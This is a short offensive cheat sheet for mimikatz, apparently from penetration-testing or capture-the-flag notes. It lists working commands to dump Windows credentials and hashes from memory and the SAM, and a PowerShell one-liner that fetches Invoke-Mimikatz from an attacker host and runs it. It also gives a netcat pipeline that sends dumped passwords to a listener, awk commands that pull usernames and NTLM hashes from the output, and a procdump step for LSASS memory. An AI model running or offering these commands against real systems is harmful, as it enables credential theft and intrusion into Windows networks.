mimikatz
Basic Commands
# Lists all available provider credentials.
# This usually shows recently logged-on user and computer credentials.
CMD> mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets
# List all SAM info
mimikatz # token::elevate
mimikatz # lsadump::sam
mimikatz # lsadump::cache
# PowerShell-based mimikatz
CMD> powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.35/post/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
PS> IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.35/post/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds
Output to Kali
# Kali
nc -nlvp 1234 > mimikatz_out.txt
# Target Windows
.\mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc64.exe -vv 10.10.14.35 1234
# Print usernames from the captured output file
cat mimikatz_out.txt|tr -d '\011\015' |awk '/Username/ { user=$0; getline; getline; print user " " $0}'|grep -v "* LM\|* NTLM\|Microsoft_OC1\|* Password : (null)"|awk '{if (length($8)>2) print $4 ":" $8}'|sort -u
# Print hashes from the captured output file
cat mimikatz_out.txt |tr -d '\011\015' |awk '/Username/ { user=$0; getline; domain=$0; getline; print user " " domain " " $0}'|grep -v "* LM\|* Password\|Microsoft_OC1"|awk '{if (length($12)>2) print $8 "/" $4 "%aad3b435b51404eeaad3b435b51404ee:" $12}'|sort -u
Procdump to mimikatz
# https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
CMD> procdump -accepteula -ma lsass.exe lsass.dmp
CMD> mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords